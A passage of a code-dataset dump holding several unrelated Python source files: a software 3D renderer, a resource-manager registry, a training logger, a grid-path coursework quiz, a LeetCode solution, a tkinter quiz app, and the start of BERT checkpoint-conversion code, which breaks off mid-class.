True:\n\t\t\t\t\tself.triangleWireframe()\n\t\t\t\t\tprint(\"triangulo: \",cont)\n\t\t\t\t\tcont += 1\n\t\t\texcept StopIteration:\n\t\t\t\tprint(\"done\")\n\t\telif polygonType == 'SHADER':\n\t\t\ttry:\n\t\t\t\tcont = 1\n\t\t\t\twhile True:\n\t\t\t\t\tself.triangleShader()\n\t\t\t\t\tprint(\"triangulo: \",cont)\n\t\t\t\t\tcont += 1\n\t\t\texcept StopIteration:\n\t\t\t\tprint(\"done\")\n\t\telif polygonType == 'GREYSHADER':\n\t\t\ttry:\n\t\t\t\tcont = 1\n\t\t\t\twhile True:\n\t\t\t\t\tself.triangleGreyShade()\n\t\t\t\t\tprint(\"triangulo: \",cont)\n\t\t\t\t\tcont += 1\n\t\t\texcept StopIteration:\n\t\t\t\tprint(\"done\")\n\n\tdef load(self, filename, translate =(0,0,0), scale=(1,1,1), rotate=(0,0,0)):\n\t\tself.loadModelMatrix(translate, scale, rotate)\n\t\tmodel = Obj(filename)\n\n\t\tvertexBufferObject = []\n\n\t\tfor face in model.faces:\n\n\t\t\tfor facepart in face:\n\n\t\t\t\tvertex = self.transform(V3(*model.vertices[facepart[0]-1]))\n\t\t\t\tvertexBufferObject.append(vertex)\n\n\t\t\t\ttry:\n\t\t\t\t\ttvertex = V3(*model.tvertices[facepart[1]-1])\n\t\t\t\texcept:\n\t\t\t\t\ttvertex = V3(*model.tvertices[facepart[1]-1],0)\n\n\t\t\t\tvertexBufferObject.append(tvertex)\n\n\t\tself.activeVertexArray = iter(vertexBufferObject)\n\n\tdef loadModelMatrix(self, translate=(0, 0, 0), scale=(1, 1, 1), rotate=(0, 0, 0)):\n\t\ttranslate = V3(*translate)\n\t\tscale = V3(*scale)\n\t\trotate = V3(*rotate)\n\n\t\ttranslation_matrix = matrix([\n\t\t\t[1, 0, 0, translate.x],\n\t\t\t[0, 1, 0, translate.y],\n\t\t\t[0, 0, 1, translate.z],\n\t\t\t[0, 0, 0, 1],\n\t\t])\n\n\n\t\ta = rotate.x\n\t\trotation_matrix_x = matrix([\n\t\t\t[1, 0, 0, 0],\n\t\t\t[0, cos(a), -sin(a), 0],\n\t\t\t[0, sin(a), cos(a), 0],\n\t\t\t[0, 0, 0, 1]\n\t\t])\n\n\t\ta = rotate.y\n\t\trotation_matrix_y = matrix([\n\t\t\t[cos(a), 0, sin(a), 0],\n\t\t\t[ 0, 1, 0, 0],\n\t\t\t[-sin(a), 0, cos(a), 0],\n\t\t\t[ 0, 0, 0, 1]\n\t\t])\n\n\t\ta = rotate.z\n\t\trotation_matrix_z = matrix([\n\t\t\t[cos(a), -sin(a), 0, 0],\n\t\t\t[sin(a), cos(a), 0, 0],\n\t\t\t[0, 0, 1, 0],\n\t\t\t[0, 0, 0, 1]\n\t\t])\n\n\t\trotation_matrix = rotation_matrix_x @ rotation_matrix_y @ rotation_matrix_z\n\n\t\tscale_matrix = matrix([\n\t\t\t[scale.x, 0, 0, 0],\n\t\t\t[0, scale.y, 0, 0],\n\t\t\t[0, 0, scale.z, 0],\n\t\t\t[0, 0, 0, 1],\n\t\t])\n\n\t\tself.Model = translation_matrix @ rotation_matrix @ scale_matrix\n\n\tdef loadViewMatrix(self, x, y, z, center):\n\t\tM = matrix([\n\t\t\t[x.x, x.y, x.z, 0],\n\t\t\t[y.x, y.y, y.z, 0],\n\t\t\t[z.x, z.y, z.z, 0],\n\t\t\t[0, 0, 0, 1]\n\t\t])\n\n\t\tO = matrix([\n\t\t\t[1, 0, 0, -center.x],\n\t\t\t[0, 1, 0, -center.y],\n\t\t\t[0, 0, 1, -center.z],\n\t\t\t[0, 0, 0, 1]\n\t\t])\n\n\t\tself.View = M @ O\n\n\tdef loadProjectionMatrix(self, coeff):\n\t\tself.Projection = matrix([\n\t\t\t[1, 0, 0, 0],\n\t\t\t[0, 1, 0, 0],\n\t\t\t[0, 0, 1, 0],\n\t\t\t[0, 0, coeff, 1]\n\t\t])\n\n\tdef loadViewportMatrix(self, x = 0, y = 0):\n\t\tself.Viewport = matrix([\n\t\t\t[self.width/2, 0, 0, x + self.width/2],\n\t\t\t[0, self.height/2, 0, y + self.height/2],\n\t\t\t[0, 0, 128, 128],\n\t\t\t[0, 0, 0, 1]\n\t\t])\n\n\tdef lookAt(self, eye, center, up):\n\t\tz = norm(sub(eye, center))\n\t\tx = norm(cross(up, z))\n\t\ty = norm(cross(z, x))\n\t\tself.loadViewMatrix(x, y, z, center)\n\t\tself.loadProjectionMatrix(-1 / length(sub(eye, center)))\n\t\tself.loadViewportMatrix()\n\n\tdef shader(self, x, y):\n\n\t\txLevel = x/self.width\n\t\treturn glColor(255,255,255)\t\n\n\tdef triangleShader(self, vertices=(), tvertices=(), texture=None):\n\t\tA = next(self.activeVertexArray)\n\t\ttA = next(self.activeVertexArray)\n\t\tB = next(self.activeVertexArray)\n\t\ttB = next(self.activeVertexArray)\n\t\tC = next(self.activeVertexArray)\n\t\ttC = next(self.activeVertexArray)\n\n\t\txmin, xmax, ymin, ymax = bbox(A, B, C)\n\n\t\tfor x in range(xmin, xmax + 1):\n\t\t\tfor y in range(ymin, ymax + 1):\n\t\t\t\tP = V2(x, y)\n\t\t\t\tw, v, u = barycentric(A, B, C, P)\n\t\t\t\tif w < 0 or v < 0 or u < 0:\n\t\t\t\n\t\t\t\t\tcontinue\n\n\t\t\t\tz = A.z * w + B.z * v + C.z * u\n\n\t\t\t\ttx = tA.x * w + tB.x * v + tC.x * u\n\t\t\t\tty = tA.y * w + tB.y * v + tC.y * u\n\n\t\t\t\tcolor = self.shader(x, y)\n\n\t\t\t\tif z > self.zbuffer[x][y]:\n\t\t\t\t\tself.pixel(x, y, color)\n\t\t\t\t\tself.zbuffer[x][y] = z\n\t\t\n\tdef triangleWireframe(self):\n\t\tA = next(self.activeVertexArray)\n\t\ttA = next(self.activeVertexArray)\n\t\tB = next(self.activeVertexArray)\n\t\ttB = next(self.activeVertexArray)\n\t\tC = next(self.activeVertexArray)\n\t\ttC = next(self.activeVertexArray)\n\n\t\tself.glLine(A,B,self.color)\n\t\tself.glLine(B,C,self.color)\n\t\tself.glLine(C,A,self.color)\n\n\tdef triangle(self):\n\t\tA = next(self.activeVertexArray)\n\t\ttA = next(self.activeVertexArray)\n\t\tB = next(self.activeVertexArray)\n\t\ttB = next(self.activeVertexArray)\n\t\tC = next(self.activeVertexArray)\n\t\ttC = next(self.activeVertexArray)\n\n\t\txmin, xmax, ymin, ymax = bbox(A, B, C)\n\t\tnormal = norm(cross(sub(B, A), sub(C, A)))\n\t\tintensity = dot(normal, self.light)\n\t\tif intensity < 0:\n\t\t\treturn 0\n\n\t\tfor x in range(xmin, xmax + 1):\n\t\t\tfor y in range(ymin, ymax + 1):\n\t\t\t\tP = V2(x, y)\n\t\t\t\tw, v, u = barycentric(A, B, C, P)\n\t\t\t\tif w < 0 or v < 0 or u < 0:\n\t\t\t\t\t#el punto esta afuera\n\t\t\t\t\tcontinue\n\n\t\t\t\tz = A.z * w + B.z * v + C.z * u\n\n\t\t\t\ttx = tA.x * w + tB.x * v + tC.x * u\n\t\t\t\tty = tA.y * w + tB.y * v + tC.y * u\n\t\t\t\t# print (tx, ty)\n\n\t\t\t\tcolor = self.texture.getColor(tx, ty)\n\n\n\t\t\t\tif z > self.zbuffer[x%self.width][y%self.height]:\n\t\t\t\t\tself.pixel(x, y, color)\n\t\t\t\t\tself.zbuffer[x%self.width][y%self.height] = z\n\n\tdef triangleGreyShade(self):\n\t\tA = next(self.activeVertexArray)\n\t\ttA = next(self.activeVertexArray)\n\t\tB = next(self.activeVertexArray)\n\t\ttB = next(self.activeVertexArray)\n\t\tC = next(self.activeVertexArray)\n\t\ttC = next(self.activeVertexArray)\n\n\t\txmin, xmax, ymin, ymax = bbox(A, B, C)\n\t\tnormal = norm(cross(sub(B, A), sub(C, A)))\n\t\tintensity = dot(normal, self.light)\n\t\tgrey = round((intensity * 255)/20)\n\t\tif intensity < 0:\n\t\t\treturn 0\n\n\t\tfor x in range(xmin, xmax + 1):\n\t\t\tfor y in range(ymin, ymax + 1):\n\t\t\t\tP = V2(x, y)\n\t\t\t\tw, v, u = barycentric(A, B, C, P)\n\t\t\t\tif w < 0 or v < 0 or u < 0:\n\t\t\t\t\t#el punto esta afuera\n\t\t\t\t\tcontinue\n\n\t\t\t\tz = A.z * w + B.z * v + C.z * u\n\n\t\t\t\tcolor = glColor(grey,grey,grey)\n\n\n\t\t\t\tif z > self.zbuffer[x%self.width][y%self.height]:\n\t\t\t\t\tself.pixel(x, y, color)\n\t\t\t\t\tself.zbuffer[x%self.width][y%self.height] = z\n","repo_name":"RandyVen/Proyecto1-Graficas","sub_path":"gl.py","file_name":"gl.py","file_ext":"py","file_size_in_byte":10622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12712925947","text":"# -*- coding: utf-8 -*-\nimport inspect\nfrom functools import wraps\n\n# resource functions (functions making objects)\n# key is the resource name (i.e. \"user\"), value is the dict, containing\n# currently only one key: func: callable object\n\n# It's a global object, because it should be shared between all resource\n# instances\n_resource_makers = {}\n\n\ndef register_func(func):\n \"\"\"\n Decorator to register function as a resource\n \"\"\"\n resource_id = func.__name__\n _resource_makers[resource_id] = {'func': func}\n return func\n\n\nclass ResourceCollectionManager(object):\n\n def __init__(self):\n self._modules = set()\n # resource registry (attributes, available in current context)\n # key is the resource name (i.e. \"user\"), value is the instantiated\n # object, if any (the object will be instantiated if we are within the\n # \"with\"-context, for example.\n self._resource_registry = {}\n # resource managers (those which ensure \"start\" and \"stop\" functionality)\n # actually, it's a dict which contains unfinished generators.\n # key is the resource name, value is the generator instance\n # Instances are added to this dict, when a xxx_mgr.start()/xxx_mgr.stop()\n # methods are used.\n self._resource_managers = {}\n\n def _active_resource_makers(self):\n \"\"\"\n Return the subset of _resource_makers.keys() registered with \"register_mod\"\n \"\"\"\n ret = set()\n for key, value in _resource_makers.items():\n if value['func'].__module__ in self._modules:\n ret.add(key)\n return ret\n\n @property\n def __members__(self):\n return self._resource_registry.keys()\n\n @property\n def __methods__(self):\n keys = self._active_resource_makers()\n ctx_keys = ['%s_ctx' % key for key in keys]\n mgr_keys = ['%s_mgr' % key for key in keys]\n return ctx_keys + mgr_keys\n\n def register_mod(self, module_name):\n \"\"\"\n Find and register all resources in the module with a given name\n :param module_name: string with a module name\n \"\"\"\n self._modules.add(module_name)\n mod = __import__(module_name)\n\n def unregister_mod(self, module_name):\n \"\"\"\n Unregister a module, make resources from the module unavailable.\n :param module_name: string with a module name\n \"\"\"\n self._modules.remove(module_name)\n\n def register_func(self, func):\n \"\"\"\n Decorator to register function as a resource\n \"\"\"\n # todo: copy-paste of the global function\n # kept within object for convenience and backward compatibility\n resource_id = func.__name__\n _resource_makers[resource_id] = {'func': func}\n return func\n\n def __getattr__(self, item):\n if item.endswith('_ctx'):\n try:\n return self._get_decorator_and_context_manager(item[:-4])\n except RuntimeError as e:\n raise AttributeError(str(e))\n elif item.endswith('_mgr'):\n try:\n return self._get_manager(item[:-4])\n except RuntimeError as e:\n raise AttributeError(str(e))\n else:\n try:\n return self._resource_registry[item]\n except KeyError as e:\n raise AttributeError(str(e))\n\n def __getitem__(self, item):\n try:\n return getattr(self, item)\n except AttributeError as e:\n raise KeyError(str(e))\n\n def _get_decorator_and_context_manager(self, resource_id):\n\n if resource_id not in self._active_resource_makers():\n raise RuntimeError(\"Don't know how to create resource %s\" % resource_id)\n resource_maker = _resource_makers[resource_id]['func']\n\n class DecoratorAndContextManager(object):\n\n def __init__(mgr, *args, **kwargs):\n # args and kwargs are function args and kwargs...\n mgr.name = kwargs.pop('_name', resource_id)\n mgr.args = args\n mgr.kwargs = kwargs\n\n def __enter__(mgr):\n mgr.generator = resource_maker(*mgr.args, **mgr.kwargs)\n resource = next(mgr.generator)\n self._resource_registry[mgr.name] = resource\n return resource\n\n def __exit__(mgr, exc_type, exc_val, exc_tb):\n next(mgr.generator, None)\n self._resource_registry.pop(mgr.name, None)\n\n def __call__(deco, callable):\n\n def wrapper(*args, **kwargs):\n generator = resource_maker(*deco.args, **deco.kwargs)\n resource = next(generator)\n self._resource_registry[deco.name] = resource\n new_args = [resource, ]\n new_args += list(args)\n ret = callable(*new_args, **kwargs)\n next(generator, None)\n self._resource_registry.pop(deco.name, None)\n return ret\n\n # actually, if you don't use py.test which tries to instrospect\n # function signature, it's enough to write\n # add @wraps(callable) decorator to the wrapper and the return it\n # But as we need to \"mock\" the function signature too,\n # we're forced to do the trick.\n # See http://emptysquare.net/blog/copying-a-python-functions-signature/\n # and http://www.python.org/dev/peps/pep-0362/#boundarguments-object\n\n argspec = inspect.getargspec(callable)\n\n try:\n argspec.args.pop(0)\n except IndexError as e:\n pass\n\n formatted_args = inspect.formatargspec(*argspec).lstrip('(').rstrip(')')\n fndef = 'lambda %s: wrapper(%s)' % (formatted_args, formatted_args)\n fake_fn = eval(fndef, {'wrapper': wrapper})\n return wraps(callable)(fake_fn)\n\n return DecoratorAndContextManager\n\n def _get_manager(self, resource_id):\n\n if resource_id in self._resource_managers:\n return self._resource_managers[resource_id]\n\n if resource_id not in self._active_resource_makers():\n raise RuntimeError(\"Don't know how to create resource %s\" % resource_id)\n resource_maker = _resource_makers[resource_id]['func']\n resource_manager = ResourceManager(self, resource_id, resource_maker)\n self._resource_managers[resource_id] = resource_manager\n\n return resource_manager\n\n # some helper functions\n\n def pdb(self):\n try:\n import ipdb\n except ImportError:\n import pdb as ipdb\n ipdb.set_trace()\n\n def shell(self, namespace=None):\n try:\n from IPython import embed\n except ImportError:\n import code\n import readline\n import rlcompleter\n # we must pass at least something in here\n if namespace is None:\n namespace = {'resources': resources}\n code.InteractiveConsole(namespace).interact()\n else:\n embed()\n\n\nclass ResourceManager(object):\n\n def __init__(self, resource_collection_manager, resource_id, resource_maker):\n self.resource_collection_manager = resource_collection_manager\n self.resource_id = resource_id\n self.resource_maker = resource_maker\n self.generators = {}\n\n def start(self, *args, **kwargs):\n name = kwargs.pop('_name', self.resource_id)\n if name in self.resource_collection_manager._resource_registry:\n raise RuntimeError('Resource with name %r has been already started' % name)\n\n generator = self.resource_maker(*args, **kwargs)\n resource = next(generator)\n self.generators[name] = generator\n self.resource_collection_manager._resource_registry[name] = resource\n return resource\n\n def stop(self, _name=None):\n name = _name or self.resource_id\n try:\n generator = self.generators[name]\n except KeyError:\n raise RuntimeError('Resource %r has not been started' % name)\n next(generator, None)\n self.generators.pop(name, None)\n self.resource_collection_manager._resource_registry.pop(name, None)\n\n\nresources = ResourceCollectionManager()\n","repo_name":"Doist/resources","sub_path":"resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":8447,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"77"} +{"seq_id":"6480295428","text":"import numpy as np\nimport pandas as pd\nimport os\nimport pickle\n\nclass Logger():\n\n def __init__(self, columns, modes, epoch=0, idx=0, rootpath=None, verbose=True):\n\n self.columns=columns\n self.mode=modes[0]\n self.epoch=epoch\n self.idx = idx\n self.data = pd.DataFrame(columns=[\"epoch\",\"iteration\",\"mode\"]+self.columns)\n self.stored_arrays = dict()\n self.rootpath=rootpath\n self.verbose = verbose\n\n def resume(self, data):\n self.data = data\n self.idx = data.index[-1]\n self.epoch = data[\"epoch\"].max()\n\n def update_epoch(self, epoch=None):\n if epoch is None:\n self.epoch+=1\n else:\n self.epoch=epoch\n\n def set_mode(self,mode):\n self.mode = mode\n\n def log(self, stats, epoch):\n\n clean_stats = dict()\n for k,v in stats.items():\n if np.array(v).size == 1:\n clean_stats[k] = v\n else:\n self.log_array(name=k,array=v, epoch=epoch)\n\n self.log_numbers(clean_stats, epoch)\n\n def log_array(self, name, array, epoch):\n\n if name not in self.stored_arrays.keys():\n self.stored_arrays[name] = list()\n\n self.stored_arrays[name].append((epoch, array))\n\n def log_numbers(self, stats, epoch):\n\n stats[\"epoch\"] = epoch\n stats[\"mode\"] = self.mode\n\n row = pd.DataFrame(stats, index=[self.idx])\n\n self.data = self.data.append(row, sort=False)\n self.idx +=1\n\n def get_data(self):\n return self.data\n\n def save(self):\n\n path = os.path.join(self.rootpath,\"npy\")\n #pickle.dump(self, open( path + \"/logger.pkl\", \"wb\" ))\n\n if not os.path.exists(path):\n os.makedirs(path)\n\n arrayfile = \"{name}_{epoch}.npy\"\n csvfile = \"data.csv\"\n\n for k,v in self.stored_arrays.items():\n for epoch, data in v:\n filepath = os.path.join(path,arrayfile.format(epoch=epoch, name=k))\n np.save(filepath, data)\n if self.verbose: print(\"saving \"+filepath)\n\n self.data.to_csv(os.path.join(self.rootpath,csvfile))\n","repo_name":"MarcCoru/crop-type-mapping","sub_path":"src/utils/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","stars":138,"dataset":"github-code","pt":"77"} +{"seq_id":"6453164019","text":"# Randomly fills a grid of size 7 x 7 with NE, SE, SW, NW,\n# meant to represent North-East, South-East, North-West, South-West,\n# respectively, and starting from the cell in the middle of the grid,\n# determines, for each of the 4 corners of the grid, the preferred path amongst\n# the shortest paths that reach that corner, if any. At a given cell, it is possible to move\n# according to any of the 3 directions indicated by the value of the cell;\n# e.g., from a cell storing NE, it is possible to move North-East, East, or North.\n# At any given point, one prefers to move diagonally, then horizontally,\n# and vertically as a last resort.\n#\n# Written by *** and Eric Martin for COMP9021\n\n\nimport sys\nfrom random import seed, choice\nfrom array_queue import *\n\ndef display_grid():\n for i in range(dim):\n print(' ', end = '')\n for j in range(dim):\n print(' ', grid[i][j], end = '')\n print()\n print()\n\ndef preferred_paths_to_corners():\n direction = {'NE': ((1, -1), (1, 0), (0, -1)),\n 'SE': ((1, 1), (1, 0), (0, 1)),\n 'SW': ((-1, 1), (-1, 0), (0, 1)),\n 'NW': ((-1, -1), (-1, 0), (0, -1))}\n route = ArrayQueue()\n preferred_paths = {}\n route.enqueue([(size, size)])\n while not route.is_empty():\n way = route.dequeue()\n x, y = way[-1]\n if (x, y) in corners:\n if (x, y) not in preferred_paths:\n preferred_paths[(x, y)] = way\n continue\n for stepx, stepy in direction[grid[y][x]]:\n if (x + stepx, y + stepy) not in way:\n if x + stepx >= 0 and x + stepx < dim:\n if y + stepy >= 0 and y + stepy < dim:\n path = list(way)\n path.append((x + stepx, y + stepy))\n route.enqueue(path)\n else:\n continue\n else:\n continue\n else:\n continue\n\n return preferred_paths\n\n\ntry:\n seed_arg = int(input('Enter an integer: '))\nexcept ValueError:\n print('Incorrect input, giving up.')\n sys.exit()\n \nseed(seed_arg)\nsize = 3\ndim = 2 * size + 1\ngrid = [[0] * dim for _ in range(dim)]\ndirections = 'NE', 'SE', 'SW', 'NW'\n\nfor i in range(dim):\n for j in range(dim):\n grid[i][j] = choice(directions)\nprint('Here is the grid that has been generated:')\ndisplay_grid()\n\ncorners = (0, 0), (dim - 1, 0), (dim - 1, dim - 1), (0, dim - 1)\npaths = preferred_paths_to_corners()\nif not paths:\n print('There is no path to any corner')\n sys.exit()\nfor corner in corners:\n if corner not in paths:\n print(f'There is no path to {corner}')\n else:\n print(f'The preferred path to {corner} is:')\n print(' ', paths[corner])\n","repo_name":"zzzz2000zzzz/COMP9021","sub_path":"quiz/quiz08/quiz_8.py","file_name":"quiz_8.py","file_ext":"py","file_size_in_byte":2806,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"71572815289","text":"#\n# @lc app=leetcode id=515 lang=python3\n#\n# [515] Find Largest Value in Each Tree Row\n#\n\n# @lc code=start\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def largestValues(self, root: TreeNode) -> List[int]:\n result = []\n def calculate(root, depth):\n if not root:\n return\n nonlocal result\n if len(result) <= depth:\n result.append(root.val)\n else:\n previous = result[depth]\n if previous < root.val:\n result[depth] = root.val\n calculate(root.left, depth + 1)\n calculate(root.right, depth + 1)\n calculate(root, 0)\n return result\n \n# @lc code=end\n\n","repo_name":"Elenionl/LeetCode","sub_path":"515.find-largest-value-in-each-tree-row.py","file_name":"515.find-largest-value-in-each-tree-row.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5831252272","text":"from tkinter import *\nfrom quiz_brain import QuizBrain\n\nTHEME_COLOR = \"#375362\"\n\nclass QuizUserInterface:\n \n def __init__(self, quiz_brain: QuizBrain):\n self.quiz = quiz_brain\n \n self.window = Tk()\n self.window.title(\"My Quiz\")\n self.window.config(padx=20, pady=20, bg=THEME_COLOR)\n \n self.score_label = Label(text=\"Score: 0\", fg=\"white\", bg=THEME_COLOR)\n self.score_label.grid(row=0, column=1)\n \n self.canvas = Canvas(width=300, height=250, bg=\"white\")\n self.question_text = self.canvas.create_text(\n 150, \n 125,\n width=280 ,\n text=\"Testing Text\", \n fill=THEME_COLOR, \n font=(\"Arial\", 20, \"italic\")\n )\n self.canvas.grid(row=1, column=0, columnspan=2, pady=50)\n \n correct_image = PhotoImage(file=\"images/true.png\")\n self.correct_button = Button(image=correct_image, highlightthickness=0, command=self.correct_button_click)\n self.correct_button.grid(row=2, column=0)\n \n wrong_image = PhotoImage(file=\"images/false.png\")\n self.wrong_button = Button(image=wrong_image, highlightthickness=0, command=self.wrong_button_click)\n self.wrong_button.grid(row=2, column=1)\n \n self.get_next_question()\n \n self.window.mainloop()\n \n \n def get_next_question(self):\n self.canvas.config(bg=\"white\")\n if self.quiz.still_has_questions(): \n self.score_label.config(text=f\"Score: {self.quiz.score}\")\n question_text = self.quiz.next_question() \n self.canvas.itemconfig(self.question_text, text=question_text)\n else:\n self.canvas.itemconfig(self.question_text, text=f\"You have finished the Quiz your score is: {self.quiz.score}\")\n self.wrong_button.config(state=\"disable\")\n self.correct_button.config(state=\"disable\")\n\n def correct_button_click(self):\n self.user_answer = self.quiz.check_answer(\"True\")\n self.user_feedback(self.user_answer)\n \n def wrong_button_click(self):\n self.user_answer = self.quiz.check_answer(\"False\")\n self.user_feedback(self.user_answer)\n \n def change_canvas_color(self, user_answer):\n if user_answer == True:\n self.canvas.config(bg=\"green\") \n else:\n self.canvas.config(bg=\"red\")\n \n def user_feedback(self, user_answer):\n self.change_canvas_color(user_answer)\n self.window.after(1000, self.get_next_question)\n \n ","repo_name":"sifisKoen/Pi-Playground","sub_path":"Quiz Game + UI/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":2604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20868185384","text":"import logging\nimport re\nfrom typing import Tuple\n\nimport torch\n\nfrom modelzoo.common.pytorch.model_utils.checkpoint_converters.base_converter import (\n BaseCheckpointConverter_HF_CS,\n BaseCheckpointConverter_PT_PT,\n BaseConfigConverter,\n BaseConfigConverter_CS_CS,\n BaseConfigConverter_HF_CS,\n ConfigConversionError,\n ConversionRule,\n EquivalentSubkey,\n FormatVersions,\n)\n\n\nclass Converter_BertLayerNorm_HF_CS(BaseCheckpointConverter_HF_CS):\n def __init__(self, hf_name, cs_name):\n super().__init__()\n self.rules = [\n # torch.nn.LayerNorm has .weight & .bias properties\n ConversionRule(\n [EquivalentSubkey(hf_name, cs_name), \"\\.(?:weight|bias)\",],\n action=self.replaceKey,\n ),\n # Old HF implementation uses .gamma instead of .weight\n ConversionRule(\n [\n EquivalentSubkey(hf_name, cs_name),\n EquivalentSubkey(\".gamma\", \".weight\"),\n ],\n action=self.replaceKey,\n ),\n # Old HF implementation uses .beta instead of .bias\n ConversionRule(\n [\n EquivalentSubkey(hf_name, cs_name),\n EquivalentSubkey(\".beta\", \".bias\"),\n ],\n action=self.replaceKey,\n ),\n ]\n\n @staticmethod\n def formats() -> Tuple[FormatVersions, FormatVersions]:\n return (FormatVersions(\"hf\"), FormatVersions(\"cs\"))\n\n @staticmethod\n def get_config_converter_class() -> BaseConfigConverter:\n return None\n\n\nclass Converter_BertModel_CS16_CS17(BaseCheckpointConverter_PT_PT):\n def __init__(self):\n super().__init__()\n self.rules = [\n # Embedding:\n ConversionRule(\n [\n EquivalentSubkey(\"embeddings\", \"embedding_layer\"),\n \"\\.word_embeddings\\.weight\",\n ],\n action=self.replaceKey,\n ),\n ConversionRule(\n [\n EquivalentSubkey(\"embeddings\", \"embedding_layer\"),\n \"\\.position_embeddings\\.weight\",\n ],\n action=self.position_embeddings_convert,\n ),\n ConversionRule(\n [\n EquivalentSubkey(\n \"embeddings.token_type_embeddings\",\n \"embedding_layer.segment_embeddings\",\n ),\n \"\\.weight\",\n ],\n action=self.replaceKey,\n ),\n ConversionRule([\"embeddings\\.position_ids\",], exists=\"left\",),\n ConversionRule(\n [\n EquivalentSubkey(\"embeddings.\", \"\"),\n Converter_BertLayerNorm_HF_CS(\"LayerNorm\", \"embed_ln_f\"),\n ],\n action=None,\n ),\n # Encoder Layers:\n ConversionRule(\n [\n EquivalentSubkey(\n \"encoder.layer\", \"transformer_encoder.layers\",\n ),\n \"\\.\\d+\\.\",\n EquivalentSubkey(\n \"attention.self.query\", \"self_attn.proj_q_dense_layer\"\n ),\n \"\\.(?:weight|bias)\",\n ],\n action=self.replaceKey,\n ),\n ConversionRule(\n [\n EquivalentSubkey(\n \"encoder.layer\", \"transformer_encoder.layers\",\n ),\n \"\\.\\d+\\.\",\n EquivalentSubkey(\n \"attention.self.key\", \"self_attn.proj_k_dense_layer\"\n ),\n \"\\.(?:weight|bias)\",\n ],\n action=self.replaceKey,\n ),\n ConversionRule(\n [\n EquivalentSubkey(\n \"encoder.layer\", \"transformer_encoder.layers\",\n ),\n \"\\.\\d+\\.\",\n EquivalentSubkey(\n \"attention.self.value\", \"self_attn.proj_v_dense_layer\"\n ),\n \"\\.(?:weight|bias)\",\n ],\n action=self.replaceKey,\n ),\n ConversionRule(\n [\n EquivalentSubkey(\n \"encoder.layer\", \"transformer_encoder.layers\",\n ),\n \"\\.\\d+\\.\",\n EquivalentSubkey(\n \"attention.output.dense\",\n \"self_attn.proj_output_dense_layer\",\n ),\n \"\\.(?:weight|bias)\",\n ],\n action=self.replaceKey,\n ),\n ConversionRule(\n [\n EquivalentSubkey(\n \"encoder.layer\", \"transformer_encoder.layers\",\n ),\n \"\\.\\d+\\.\",\n EquivalentSubkey(\"attention.output.\", \"\"),\n Converter_BertLayerNorm_HF_CS(\"LayerNorm\", \"norm1\"),\n ],\n action=None,\n ),\n ConversionRule(\n [\n EquivalentSubkey(\n \"encoder.layer\", \"transformer_encoder.layers\",\n ),\n \"\\.\\d+\\.\",\n EquivalentSubkey(\n \"intermediate.dense\", \"ffn.ffn.0.linear_layer\"\n ),\n \"\\.(?:weight|bias)\",\n ],\n action=self.replaceKey,\n ),\n ConversionRule(\n [\n EquivalentSubkey(\n \"encoder.layer\", \"transformer_encoder.layers\",\n ),\n \"\\.\\d+\\.\",\n EquivalentSubkey(\"output.dense\", \"ffn.ffn.1.linear_layer\"),\n \"\\.(?:weight|bias)\",\n ],\n action=self.replaceKey,\n ),\n ConversionRule(\n [\n EquivalentSubkey(\n \"encoder.layer\", \"transformer_encoder.layers\",\n ),\n \"\\.\\d+\\.\",\n EquivalentSubkey(\"output.\", \"\"),\n Converter_BertLayerNorm_HF_CS(\"LayerNorm\", \"norm2\"),\n ],\n action=None,\n ),\n # Head:\n ConversionRule(\n [\n \"pooler\\.\",\n EquivalentSubkey(\"dense\", \"pooler.ffn.0.linear_layer\"),\n \"\\.(?:weight|bias)\",\n ],\n action=self.replaceKey,\n ),\n ]\n\n def position_embeddings_convert(\n self,\n old_key,\n new_key,\n old_state_dict,\n new_state_dict,\n from_index,\n action_fn_args,\n ):\n self.replaceKey(\n old_key, new_key, old_state_dict, new_state_dict, from_index\n )\n if from_index == 1:\n # HF stores an register buffer with position_ids\n position_id_key = re.sub(\n \"\\.position_embeddings\\.weight\", \".position_ids\", new_key\n )\n max_position_embeddings = action_fn_args[\"configs\"][1][\"model\"][\n \"max_position_embeddings\"\n ]\n new_state_dict[position_id_key] = torch.arange(\n max_position_embeddings\n ).expand((1, -1))\n\n @staticmethod\n def formats() -> Tuple[FormatVersions, FormatVersions]:\n return (FormatVersions(\"cs-1.6\"), FormatVersions(\"cs-1.7\"))\n\n @staticmethod\n def get_config_converter_class() -> BaseConfigConverter:\n return ConfigConverter_Bert_CS16_CS17\n\n\nclass ConfigConverter_Bert_CS16_CS17(BaseConfigConverter_CS_CS):\n def __init__(self):\n super().__init__()\n # Config didn't change between 1.6 and 1.7. Copy all keys.\n self.rules = [\n ConversionRule([\".*\"], action=self.replaceKey),\n ]\n\n @staticmethod\n def formats() -> Tuple[FormatVersions, FormatVersions]:\n return (FormatVersions(\"cs-1.6\"), FormatVersions(\"cs-1.7\"))\n\n\nclass Converter_BertModel_CS16_CS18(BaseCheckpointConverter_PT_PT):\n def __init__(self):\n super().__init__()\n self.rules = [\n # Catch checkpoints from Pytorch 2.0 API\n ConversionRule([Converter_BertModel_CS16_CS17(),], action=None,),\n # Catch checkpoints from depricated PyTorchBaseModel\n ConversionRule(\n [\n EquivalentSubkey(\"\", \"model.\"),\n Converter_BertModel_CS16_CS17(),\n ],\n action=None,\n ),\n ]\n\n @staticmethod\n def formats() -> Tuple[FormatVersions, FormatVersions]:\n return (FormatVersions(\"cs-1.6\"), FormatVersions(\"cs-1.8\", \"cs-1.9\"))\n\n @staticmethod\n def get_config_converter_class() -> BaseConfigConverter:\n return ConfigConverter_Bert_CS16_CS18\n\n\nclass ConfigConverter_Bert_CS16_CS18(ConfigConverter_Bert_CS16_CS17):\n def __init__(self):\n 